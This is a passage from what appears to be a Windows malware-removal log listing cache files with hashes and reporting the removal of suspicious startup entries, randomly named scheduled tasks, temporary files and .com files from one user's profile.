2022-03-22 10:40 - 2022-03-22 10:40 - 000007308 ____A
[C781D87A1A3679C6EAAD385B80107AF5] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\9e4ce962a349648b3c2d4cc26e454753583ce56a.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000016444 ____A
[B02C77F58169F3A10193E8D6D5270F6A] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\a1126154f8711173c0275780d40b7fc5aea05606.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000017264 ____A
[FDF926055DB7011D9E27C10530843BFD] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\a2c1060239da08649f4cc53e2a0773749069b4d8.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000027932 ____A
[DCDDF7E041247B0E49707B349CEFF6CD] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\a57c1088b20f824537bd3c28c9d1bd9df139ed2a.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000006060 ____A
[B726EDD43A3F61F1A2AE54EE2536DA88] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\a793e3e0d1afa28806699d88759463837cf7875f.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000038584 ____A
[44DC15588E9CF6CABA8106B4D3F22CE5] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\aec1b7d2d43ea2d2075f33d9dff0dc7d13397e7e.qmlc
2022-03-22 11:23 - 2022-03-22 11:23 - 000058952 ____A
[2B0F1D8FE6DEDD1FAA27CBA2464F670F] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\afa875fce0821dc43a36710251ea223995ea5229.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000014932 ____A
[B9ED01BEEA864C16F7A86475338D2A1D] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\b29650e27b002c2798ce3a3e6cb6ddb73db6a038.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000035640 ____A
[D1754B30D49A1A5779596F62A2733AF9] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\b41937330a86ce9fee75a7048adb11b769a45b3c.qmlc
2022-03-22 11:56 - 2022-03-22 11:56 - 000040892 ____A
[6775108841E9A451610D617E32379255] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\b6d9338b539f378c76ef1139788263c1a07aa014.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000101468 ____A
[FA9CFFCE37DB9DE7B31CC384A56CD148] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\b9d2335ce9491e89f60d6479611231dba26ffb1e.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000043764 ____A
[16E83352B577017A4EA1A0F03808E41D] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\bb1b6f0a4d7e07256be1f3314a12c76447e8e9d7.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000005580 ____A
[9EFB349301085A426471E5FED422C527] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\c13a0dfac32ed16d4b282e2ad4d19a1380843a9b.qmlc
2022-03-22 11:56 - 2022-03-22 11:56 - 000013620 ____A
[6719B8173CDDE3A0B8FD4E3E7407B2B4] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\c13cda2c097ec1520ca3060e87838a163454584d.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000013048 ____A
[C121DAFB3D90FF970FAADD05E06497A6] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\c25a19c61bda483211df821875ed5226be615d23.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000018564 ____A
[E9B36CA8CE3056842FCCCAD456E1E9F0] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\c355a0738407baaab193aa1cfc01475600959ede.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000001740 ____A
[A7295B4C45C6164522AA0C40DE40C2FA] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\c4d96430069ffe640d6e22b3661c6500f9aadd95.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000024568 ____A
[7E38CE210AC593B2EF475CC24EEB82BD] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\c55e95c22b1a1b2a1c95b219e7a0e5a13c4108c2.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000026340 ____A
[49E704C9B0D866A355E16CF187ACBC57] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\c6da4965b24b67e33b14d22e13d81146362195b1.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000005036 ____A
[EDFF427C9B391AE4D73A37CFF401EAA6] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\c70eb0f80d0cf7a9fcf69b79dbd23c9c1e393b21.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000010608 ____A
[68D81A2AF02D005E78E3889763B71955] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\c7f5d769a1cf8c7f79053219959679b2a01cd04a.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000033268 ____A
[3B20ED8BC3DA5848E4F898F70C4AFD0F] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\c903e57fcbd3eab67e1440178ab4d1eddbd48e6a.qmlc
2022-03-22 11:24 - 2022-03-22 11:24 - 000034164 ____A
[81ED9ED2604377E909EDDD9F4E44125B] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\cba7ff17dd5e03937eca97f458dddbc1604ab209.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000009040 ____A
[83FC4BCE6655646EDD635EB987504D58] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\ccef0cf487a75f3f7158b524c68bccb80a243ea8.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000005316 ____A
[7950E498EAD4A4C702F5672821F99169] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\ce29b958f0195107c72d07215335d17ba783b1c5.qmlc
2022-03-22 11:23 - 2022-03-22 11:23 - 000033048 ____A
[4405B872E28FBEFDAE0076E0D2194FE0] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\cfa6ba058997d213f608ed6774e5391363434638.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000033620 ____A
[10F553F53443BB78039541EEF4B8BCB9] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\cfd5fd1fc5ef9593ba2bb19a03c41f0bcf80ea24.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000007924 ____A
[BE3D25376FCE1F9CE217C8DE5EB21CFA] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\d1ba333231fa46fa77f1e4ccdae1abe1bb1b333a.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000013212 ____A
[4606F06672E4380FC48BEBE74FF29E49] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\d25198657b6859b9e3088e0e2e33b73b08b9f225.qmlc
2022-03-22 11:23 - 2022-03-22 11:23 - 000012596 ____A
[1B9F0BDAFE6A65BC101726A0B1A14453] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\d35a05a1a95dfc4770164caa7802fa96f9df198c.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000017008 ____A
[BBA3C71A1FCC039D161CD9362361786B] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\d36f6f2a0f60b942662fd2021e73314801af3322.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000028512 ____A
[E031C3E3D0FBDE3F239DDEE96A2C5B31] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\d51319dc0adec77467f2e503977f82f640a1f189.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000004524 ____A
[2BE01441BB58DB91BCCEE05245EFF464] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\d5dff33ce9ba5fc3c56c1bff708230338669ff98.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000028552 ____A
[3E9228726A6C9D6D5FDF70D2D56CAA54] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\da15507144290f96413e0e3dbcb1ad1bb354cf79.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000003936 ____A
[BBB19DE76A1579DA11E1C87580881310] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\da4ce2a26636eade7a2c708ea296720a718028ff.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000005792 ____A
[15049C700376F2D150E1FB1FB9DB50C3] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\dc223a49c99363e3e6c031586f678de3095b962c.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000002648 ____A
[A261746307D5CFDFBBDFF3E784D23861] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\dd41a55d4492d05b9d8cbf3fb927b275279ead3c.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000026732 ____A
[86958EAC584F854C7007064FDA9815B9] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\df7458f42fe95954b4294636439108991c8d86b0.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000002056 ____A
[30C50B26099D4E2556BB0DD42816463F] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\e2561b74facf7726c84c1ff8481261bd9c682493.jsc
2022-03-22 10:40 - 2022-03-22 10:40 - 000029712 ____A
[5AB576937D163B7A1237AD9C4024FC04] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\e4afe071288ff3bab828844d371e7fcecda80e40.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000026552 ____A
[3F717835D69DB36ED307056DFFFA3E6B] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\e7bf469fe2efa8374e151a508060844419172148.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000004700 ____A
[76121082A4D4846DD3842ECE71E49876] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\e7fddf7cc3760d1d010f0755f329a6b96fa98a25.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000006704 ____A
[1E3EF35EA59A035B6397F4746185D341] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\e82918e943ade82dcd7e27e3605b011d01198c0b.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000003916 ____A
[C8B5A06E3E8ADD4D5C84C469255436BF] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\ea7341485efe29c836c7059b5069b19ccf09f3a7.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000041544 ____A
[06834BBCEF77996D9823BD4B1FB4101C] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\eb9b3f56c3ab2cb191a321df136485895121ea49.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000029080 ____A
[80BB287E8F0DAC3DCC6925AEF21F3CAC] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\ece054897e5f1cae0101d02691e017fc6e4c362e.qmlc
2022-03-22 11:23 - 2022-03-22 11:23 - 000034104 ____A
[017E03B9F1B548731D1D3BCFD1B84942] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\f34c177eab636e6eb6ec4cfa11df101767d0021b.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000020324 ____A
[9272662BB01A6C7476FB13FBD9112252] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\f4ec6bb91f996a0634c8eb4280d2e35af160b1cd.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000011544 ____A
[8300857124EE538B8C8FC85F3734F52A] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\f9404c2914fd59b18429a4b179f44156ba6cab23.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000020856 ____A
[0AD37BB7A5A3FCF24B5CD30F8C2DDF49] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\f9f15d182c4295e5f3e1e7f821ff4555bd75f3d9.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000111344 ____A
[F5A4DED546084DE07B3376253CE761C9] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\fb4b82088c76212e6a8fffbbf18d1f1f5a5bde67.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000035232 ____A
[DACCA05BAD203F2B25EC4CAF3CDF1C1A] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\fbb670c1c94485df9b83374c682d842b1b7773c5.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000021972 ____A
[3B645B5DA5CA146D1DF7206B8DF83441] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\fbfd8d2e1df4808d5a834b7f3d6d86d7e367ef0c.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000016712 ____A
[BDC14CF4D72F70A2744C4CBD44C6DEAF] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\fd519f9eff3982301705060db0d43e7131c90bf3.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000017140 ____A
[7A098F353F3B8D04D2AA430F3AED0401] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\fd6ce493ed2514bc7eb7393d4c5ee3cf47497fe9.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000025348 ____A
[CBE2B283DF8AB80A726E7772C0787469] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\fd94d470dcade3fec14c1b36011fa18196de6ce3.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000005424 ____A
[E8F4FA2C61582388751A004DFDC381BB] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\ffddc46fa9e0919296460fcdc5c17b92aaec954b.qmlc
2022-03-22 10:40 - 2022-03-22 10:40 - 000005864 ____A
[4D5CC9DE3478C69B569B831690B94898] () C:\Users\Karin
Hostetler\AppData\Local\mbam\cache\qmlcache\fffa58d88e9e995407c57ba0e1f9295f117be395.qmlc
====== End of Folder: ======
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\HPUsageTrackingLEDM"
=> not found
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\MobisynapseSyncHelper"
=> removed successfully
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\BYRUA_AGENT" =>
removed successfully
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\DYMOWebApi" =>
removed successfully
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\DLSService" =>
removed successfully
"HKU\S-1-5-21-1394640484-365018484-2708498470-1001\Software\Microsoft\Windows\CurrentVersion\Run\\BYRUA_AGENT"
=> removed successfully
"HKLM\Software\Microsoft\Windows
NT\CurrentVersion\Schedule\TaskCache\Plain\{058B7C2A-04F0-45DE-9627-9C6E7CCE7BA8}"
=> removed successfully
"HKLM\Software\Microsoft\Windows
NT\CurrentVersion\Schedule\TaskCache\Tasks\{058B7C2A-04F0-45DE-9627-9C6E7CCE7BA8}"
=> removed successfully
C:\WINDOWS\System32\Tasks\asdsdasdjikindasddeyu => moved successfully
"HKLM\Software\Microsoft\Windows
NT\CurrentVersion\Schedule\TaskCache\Tree\asdsdasdjikindasddeyu" => removed
successfully
"HKLM\Software\Microsoft\Windows
NT\CurrentVersion\Schedule\TaskCache\Plain\{27302AB8-5990-4AC3-BEB6-CF5627D88D26}"
=> removed successfully
"HKLM\Software\Microsoft\Windows
NT\CurrentVersion\Schedule\TaskCache\Tasks\{27302AB8-5990-4AC3-BEB6-CF5627D88D26}"
=> removed successfully
C:\WINDOWS\System32\Tasks\calendersw => moved successfully
"HKLM\Software\Microsoft\Windows
NT\CurrentVersion\Schedule\TaskCache\Tree\calendersw" => removed successfully
"HKLM\Software\Microsoft\Windows
NT\CurrentVersion\Schedule\TaskCache\Plain\{4EBD398E-9E3B-4A48-8FF6-85D216BCAB3C}"
=> removed successfully
"HKLM\Software\Microsoft\Windows
NT\CurrentVersion\Schedule\TaskCache\Tasks\{4EBD398E-9E3B-4A48-8FF6-85D216BCAB3C}"
=> removed successfully
"HKLM\Software\Microsoft\Windows
NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\RunCampaignManager"
=> not found
"HKLM\Software\Microsoft\Windows
NT\CurrentVersion\Schedule\TaskCache\Plain\{53FC2A34-956B-4691-8FCB-DA0D66138CBD}"
=> removed successfully
"HKLM\Software\Microsoft\Windows
NT\CurrentVersion\Schedule\TaskCache\Tasks\{53FC2A34-956B-4691-8FCB-DA0D66138CBD}"
=> removed successfully
C:\WINDOWS\System32\Tasks\asdaddddasdadsddasdeyu => moved successfully
"HKLM\Software\Microsoft\Windows
NT\CurrentVersion\Schedule\TaskCache\Tree\asdaddddasdadsddasdeyu" => removed
successfully
"HKLM\Software\Microsoft\Windows
NT\CurrentVersion\Schedule\TaskCache\Plain\{C897E049-5067-41C4-8F4C-CB5C6B419D54}"
=> removed successfully
"HKLM\Software\Microsoft\Windows
NT\CurrentVersion\Schedule\TaskCache\Tasks\{C897E049-5067-41C4-8F4C-CB5C6B419D54}"
=> removed successfully
C:\WINDOWS\System32\Tasks\microWord => moved successfully
"HKLM\Software\Microsoft\Windows
NT\CurrentVersion\Schedule\TaskCache\Tree\microWord" => removed successfully
HKCU\Software\Classes\Local
Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08
=> removed successfully
HKCU\Software\Classes\Local
Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\BookReader_B171F20233094AC88D05A8EF7B9763E8
=> removed successfully
HKCU\Software\Classes\Local
Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\LearningTools_7706F933-971C-41D1-9899-8A026EB5D824
=> removed successfully
HKCU\Software\Classes\Local
Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368
=> removed successfully
C:\Users\Karin Hostetler\AppData\Roaming\myciaB..tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\B.mvKwd.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\Fkhvfuv.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\IlxrjIs.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\.EipzDA.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\FooEDIz.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\ianksBp.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\ljesr.e.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\pAsnGil.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\bvcozKc.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\vacfsmG.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\gelfCgB.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\.DmrCyx.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\uhhsnBd.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\hdpl.A..tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\fhIqKrG.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\h.dA..r.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\pF.Fltn.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\jKsc.Db.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\ymybaBG.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\abF.FyJ.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\AfKprbo.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\.gq.eEv.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\Kjvon.z.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\hc.Ekso.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\zmabqBm.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\pddmtsw.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\flwKCyx.tmp => moved successfully
"C:\WINDOWS\system32\Tasks\asdsdasdjikindasddeyu" => not found
C:\Users\Karin Hostetler\AppData\Roaming\GK.xB.H.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\hHKvy.s.tmp => moved successfully
"C:\WINDOWS\system32\Tasks\asdaddddasdadsddasdeyu" => not found
C:\ProgramData\timagar.com => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\xbfAl.r.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\DgkIlaH.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\rGjizBd.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\kawiKkt.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\KAJdHsx.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\kaampdk.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\c.pmfr..tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\FkyDzBg.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\.yvbevo.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\CqicpoE.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\imec.rK.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\.wB.u.k.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Local\mbam => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\x.fkmhm.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\.AInoHs.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\hHpH.vg.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\.Fixosu.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\As.e.Iq.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\u.vBKhg.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\FHm.CCw.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\G.zIGwn.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\uebnfhx.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\FqFql.I.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\vowws.H.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\.BahC.h.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\zBllBya.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\qcmJyrv.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\BcvEhIh.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\hKKAJt..tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\H.FnrcA.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\FcfgK.l.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\JBAeesf.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\.yvkw.y.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\GyhgfDG.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\rGHtFCn.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\pzvEJ.c.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\cxuionk.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\zatwfvJ.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\KaAzBzg.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\zIBKqww.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\EAyEynk.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\BvqpwdK.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\yc.Kam..tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\cbmkybA.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\Io..gvn.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\CrKgBBd.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\tgIysyi.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\EDhbFIz.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\nGtAkFz.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\vCkilCq.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\EaBiAea.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\CisKbHh.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\.r.ubyg.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\migEyFu.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\.tyCkte.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\EygEhJE.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\Ja.AJly.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\hgJmzHc.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\lfjDy.A.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\bwyFtJD.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\d.KvBEk.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\hGmrugl.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\CFCbraa.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\swhi.Fm.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\GuyFxhj.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\zkKIqmK.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\oCGeaDq.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\iewoixB.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\IvocJvb.tmp => moved successfully
"C:\WINDOWS\system32\Tasks\microWord" => not found
"C:\WINDOWS\system32\Tasks\calendersw" => not found
C:\ProgramData\ESETNONU.com => moved successfully
C:\ProgramData\milon.com => moved successfully
C:\ProgramData\ddond.com => moved successfully
"C:\Users\Karin Hostetler\AppData\Roaming\.AInoHs.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\.BahC.h.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\.DmrCyx.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\.EipzDA.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\.Fixosu.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\.gq.eEv.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\.r.ubyg.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\.tyCkte.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\.wB.u.k.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\.yvbevo.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\.yvkw.y.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\abF.FyJ.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\AfKprbo.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\As.e.Iq.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\B.mvKwd.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\BcvEhIh.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\bvcozKc.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\BvqpwdK.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\bwyFtJD.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\c.pmfr..tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\cbmkybA.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\CFCbraa.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\CisKbHh.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\CqicpoE.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\CrKgBBd.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\cxuionk.tmp" => not found
